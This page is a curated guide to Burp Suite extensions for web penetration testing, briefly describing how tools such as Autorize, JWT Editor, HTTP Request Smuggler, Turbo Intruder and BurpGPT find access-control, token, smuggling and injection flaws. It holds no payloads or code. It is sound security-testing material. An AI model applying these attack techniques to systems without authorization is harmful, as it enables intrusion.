MENU

On This Page

  1. Autorize
  2. Sharpener
  3. Param Miner
  4. JWT Editor
  5. Collaborator Everywhere
  6. Upload Scanner
  7. HTTP Request Smuggler
  8. Reflected Parameters
  9. ActiveScan++
  10. Additional Scanner Checks
  11. Turbo Intruder
  12. Java Deserialization Scanner
  13. JSpector
  14. BurpGPT
  15. ReconAIzer
  16. See Also

Useful Burp Extensions for Web Security Testing

Burp Suite is the de facto tool for web application security testing. While powerful out of the box, its true potential is unlocked through extensions. These plugins enhance scanning, automate reconnaissance, detect logic flaws, and help uncover vulnerabilities that passive and active scanners often miss.

This guide covers a curated list of must-have Burp extensions for penetration testers and bug bounty hunters, focusing on practical utility and integration into real-world workflows.

Autorize

Detects authorization vulnerabilities by comparing high-privilege and low-privilege user access.

  • Provide a low-privilege user's session cookie.
  • Browse the application as an admin.
  • Autorize automatically replays each request using the low-privilege session to identify missing access controls.

You can also replay requests without cookies to detect authentication bypass issues.

Sharpener

Improves usability in Repeater and Intruder by enhancing nested tab management.

  • Copy and paste styles between tabs.
  • Customize tab appearance for better workflow organization.
  • Access via the dropdown arrow (v) on any tab.

Param Miner

Discovers hidden parameters, headers, and cookies that may lead to vulnerabilities like web cache poisoning or information disclosure.

Usage: Right-click a request -> "Guess (cookies | headers | parameters)".

Highly effective during recon and API testing phases.

JWT Editor

A powerful tool for working with JSON Web Tokens (JWTs).

  • Automatically detects JWTs in requests/responses.
  • Enables real-time editing, signing, and encryption.
  • Supports known attacks: algorithm switching, weak secrets, encryption bypass.

New "JWT" tab appears in Repeater and a dedicated panel in the top-right corner of Burp.

Collaborator Everywhere

Enhances detection of out-of-band vulnerabilities (e.g., SSRF, blind XSS, DNS exfiltration).

  • Automatically injects non-invasive headers (e.g., X-Forwarded-Host) that trigger callbacks to Burp Collaborator.
  • No manual setup required - just browse the target.
  • Results appear under the "Issues" tab.

Upload Scanner

Automates detection of file upload vulnerabilities.

  • Analyzes upload points for misconfigurations.
  • Tests for executable file upload, MIME type bypass, and path traversal.

HTTP Request Smuggler

Designed to detect and exploit HTTP Request Smuggling vulnerabilities.

  • Automatically probes for CL.TE, TE.CL, and other smuggling variants.
  • Handles complex payload offsets and encoding.

Usage: Right-click request -> "Launch smuggler probe" -> Check output panel.

Reflected Parameters

Monitors traffic for reflected parameter values (longer than 3 characters) in responses - a key indicator of potential XSS, SSRF, or open redirect vectors.

  • Tracks internal Proxy and Spider requests.
  • Send findings to Scanner, Repeater, or Intruder.
  • Option to scan all or specific reflected parameters.

ActiveScan++

Extends Burp's built-in scanner with advanced detection logic and deeper payload analysis.

  • Improved coverage for XSS, SQLi, and command injection.
  • Better context-aware fuzzing.

Additional Scanner Checks

Adds critical passive checks for missing security headers:

  • HTTP Strict Transport Security (HSTS)
  • X-Content-Type-Options: nosniff
  • X-XSS-Protection
  • Multiple occurrences of security headers
  • Missing HTTP -> HTTPS redirect
  • DOM-based XSS detection

Helps enforce secure configuration - a key part of attack surface reduction.

Turbo Intruder

For high-speed, complex attack scenarios that Burp Intruder can't handle.

  • Send thousands of requests with custom Python scripts.
  • Supports connection reuse and parallelization.
  • Ideal for race conditions, brute force, and large payload testing.

Java Deserialization Scanner

Detects Java deserialization vulnerabilities (e.g., in serialized objects in cookies or API calls).

  • Integrates with passive and active scanners.
  • Manual testing via dedicated tab (Intruder-like interface).

JSpector

GitHub - hisxo/JSpector

Passively crawls JavaScript files to extract:

  • Hidden endpoints and API routes
  • Hardcoded secrets
  • Dangerous functions (e.g., eval(), document.write())

Automatically creates issues in Burp, improving visibility into client-side attack surface.

BurpGPT

GitHub - aress31/burpgpt

Integrates OpenAI's GPT models into Burp's passive scanner.

  • Identifies bespoke vulnerabilities traditional scanners miss.
  • Uses AI to analyze request/response patterns.
  • Customizable prompts for targeted analysis (e.g., business logic flaws).

Represents the next generation of intelligent, context-aware scanning.

ReconAIzer

GitHub - hisxo/ReconAIzer

Leverages OpenAI (GPT) to accelerate reconnaissance.

  • Discovers endpoints, parameters, subdomains, and URLs from JS and responses.
  • Automates note-taking and hypothesis generation.
  • Helps map the full attack surface faster.

See Also

Published on Aug 20, 2025